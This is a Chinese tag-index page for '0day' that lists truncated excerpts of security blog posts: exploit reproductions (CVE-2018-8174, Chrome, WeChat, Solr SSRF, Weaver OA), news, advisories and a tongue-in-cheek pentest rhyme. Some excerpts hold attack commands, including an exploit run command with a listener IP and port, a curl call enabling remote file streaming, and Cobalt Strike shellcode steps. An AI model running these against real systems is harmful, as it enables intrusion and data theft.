首页 > TAG信息列表 > 0day

0day漏洞

      git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git     从github上下载文件 cd CVE-2018-8174_EXP.git     进入文件夹        python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444 (-u 是攻击

Apache Log4j2,RASP 防御优势及原理

Apache Log4j2 远程代码执行漏洞已爆发一周,安全厂商提供各类防御方案和检测工具,甲方团队连夜应急。 影响持续至今,网上流传的各种利用和绕过姿势还在层出不穷,影响面持续扩大。所有安全人都开始反思一个问题:当前的防御是否有效?针对这样的 0day 再次发生,什么是有效的手段? 阿里云安全

Goby && Grafana未授权任意文件读取 0day

Grafana 未授权任意文件读取 0day 漏洞,利用Goby批量扫描 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏

〖教程〗Ladon 0day通用执行命令DLL生成器-MS17010演示

Ladon8.9更新功能 20210920 [+]CmdDll Windows 0day漏洞通用DLL注入生成器,生成的DLL仅5KB,非常适合0day加载 2021.9.15 [u]webscan CS保留 [u]CmdDll 去除黑框 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞,Office文档利用模块 影响版本: 包括Windows 7/8/8.

【windows10】 关于http服务器遭受webshell攻击

【windows10】 关于http服务器遭受webshell攻击 1、背景2、ip地址查询3、可疑请求ip 1、背景 在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。 比如: 209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm

利用Windows 0day漏洞部署DevilsTongue恶意软件

导读以色列情报公司Candiru利用微软7月补丁日中修复的2个0day漏洞,部署名为 DevilsTongue 的新恶意软件。 0x00 事件概述 近日,微软和Citizen Lab发现Candiru(微软称为 Sourgum)利用微软7月补丁日中修复的2个0 day漏洞(CVE-2021-31979和CVE-2021-33771)部署名为 DevilsTongue 的新恶

吾爱破解“凉”了之后,还能去哪儿下载软件?

最近,知名社区「吾爱破解论坛」精品区终于回归,但这次精品区版规又双叒新增了如下版规: 加持如此版规之后,对于多数人来说,基本可以宣布吾爱破解已经凉凉 事实上,越来越多的好用的软件站正在消失… 阿虚很久之前写过一篇这样的文章: 文中推荐的JZ5U绿色下载(www.jz5u.com/Soft/)、

【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)

漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Con

从PDO下的SQL注入思路到获得GIT 2000star项目0day

0x00 前言 有技术交流或红队/渗透测试方向培训,网络安全有关业务需求的朋友欢迎联系QQ547006660 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x01 PDO简介 PDO全名PHP Data Object PDO扩展为PHP访问数据库定义了一个轻量级的一致接口。PDO提供了一个数据访问抽象层,这

计算机漏洞安全相关的概念POC 、EXP 、VUL 、CVE 、0DAY

目录 1.POC 2.EXP 3.VUL 4.CVE漏洞编号 5.0DAY漏洞和0DAY攻击 1.POC POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。 2.EXP EXP,Exploit,中文意思是“漏洞利用”。

微信0day复现

由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限 影响版本 <=3.2.1.141(Windows系统) 打开cs4.0生成一个payload 将文件保存本地后提取其中的

通达OA v11.7后台SQL注入到RCE[0day]——典型的SQL绕错场景

通达OA v11.7后台SQL注入到RCE[0day] 2020-09-18阅读 3720   Author: AdminTony 1.测试环境 测试版本:通达OA v11.7版本 限制条件:需要账号登录 2.代码审计发现注入 注入出现在general/hr/manage/query/delete_cascade.php文件中,代码实现如下: 首先判断$condition_cascad

解决微信0day上线CobaltStike的几个问题

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归【爱国小白帽】所有 我在复现这个漏洞时遇到了很多问题,相信大部分人也遇到了,所以在这里总结一下。如有遗漏,欢迎补

WebLogic T3 反序列化 0day 漏洞

关闭 T3 协议或限制访问地址。 1、检查是否开启 T3 协议:查找应用服务器路径是否存在 /bea_wls_deployment_internal/loginUser.do  (返回状态码是 200 为已开启) 2、关闭和限制方式:在连接筛选器中输入: weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中 输入: ip

微信被曝高危0day漏洞,建议立即更新

微信被曝高危0day漏洞,建议立即更新 4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。 作者:三分浅土来源: FreeBuf 4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。 黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatw

【安全资讯】梅开二度,Chrome再次被曝0day漏洞

作者|三分浅土来源|FreeBuf.com发布时间|2021-04-15 一波未平一波又起,4月13日有安全人员在Twitter上公布了Chrome的0day漏洞PoC。该漏洞可以启动计算器应用程序,一时间好友圈里都被计算器刷屏了。 图片来源:51cto.com 但没想到仅隔一天,在4月14日,Chrome又被曝了第二个0day

Cobalt Strike 利用 Chrome 0day 上线

1.首先尝试弹出记事本,成功说明存在漏洞利用2.CS开启监听2.1生成pyload,https的稳定,勾选x642.2生成之后获得pyload.c2.3将shellcode的`\`全部替换为`,0`然后取出来shellcode  放入 chrome 0day 中2.4复制出来 放入 POC 中 第7行 给shellcode  赋值数组,保存 成 chrome.html2.5执行

【漏洞复现】Chrome 最新0day RCE

利用条件 关闭浏览器(chrome、edge等)沙盒   环境: win7/win10 chrome 89.0.4389.82(x64) 内存好像要够大:8/16g poc:https://github.com/r4j0x00/exploits/tree/master/chrome-exploit   poc: exp.html <script src="exp.js"></script>   exp.js /* /* BSD 2-Clause

hvv 0day 泛微OA V8 sql注入 / V9 文件上传(含批量poc)

0x00泛微OA介绍 泛微成立于2001 年,总部设立于上海,专注于协同管理OA软件领域,并致力于以协同OA为核心帮助企业构建全新的移动办公平台。 0x01漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 泛微OA V9 存在文件上传接口导致任意文件上传

计算机漏洞安全相关的概念POC 、EXP 、VUL 、CVE 、0DAY

转载:https://blog.csdn.net/qq_37622608/article/details/88048847 1.POC POC,Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2.EXP EXP,Exploit,中文意思是“漏洞利用

渗透三字经

渗透网站娱乐版进谷歌  找注入没注入  就旁注没旁注  用0day没0day  猜目录没目录  就嗅探爆账户  找后台传小马  放大马拿权限  挂页面放暗链  清数据 渗透企业实战版搞企业  先扫描扫描器  商业好默密码  都知道社工库  找一找邮箱号  先列好九头

杂文记录(一)

群里看到大佬们发的,感觉挺有趣的,记录一下,23333333 渗透学的再好, 却无法渗透你的心, 服务器入侵的再多, 对你只有guest, 是我的DDOS造成了你的拒绝服务 还是我的shell再次被你查杀 你总有防火墙,我始终不肯放弃, 想渗透你的内心, 无奈jsp+oracle成为我的阻碍, 找不到你的注入点,扫不

0day Poc编写指南(实战篇)

为了证明某些人无脑喷咱家脚本hacker小子,所以呢,有必要证明一下,咱家也是有实力去写POC的,只是不喜欢花时间重复造轮子而已,POC还是喜欢用PY来写,别问我为什么不用Csharp,方便某些玩Linux的小伙伴,嗯嗯,跨平台移植性的一个问题首先呢,小编在某站点有幸得到某编写好的POC,该POC针对dedecms V

【转载】2019护网结束,复盘攻防,聊聊安全!

截止到28日5点,HW行动终于结束,朋友圈感觉是在过年,到处是倒计时和庆祝声。看来防守方们7*24小时的看监控还是比较无奈的。本次复盘基于我对整个护网行动的观察总结而来,仅代表我个人观点,如有不妥之处,欢迎交流。   1.整体攻防的思考 本次攻防,从规则到各方实力,都是绝无仅有的。经常有

0day审计案例(1)

title: 0day审计案例(1) 一次简单的代码审计实战来自风哥的一篇文章 这第一篇文章只是一个前言,第二篇文章是我看完风哥的审计过程,然后我自己审计的文章。 环境搭建 phpstudy BlueCMSv1.6sp源码 代码审计工具 总结功能点 BlueCMS本次代码审计实战靶场 拿到这样一个CMS我们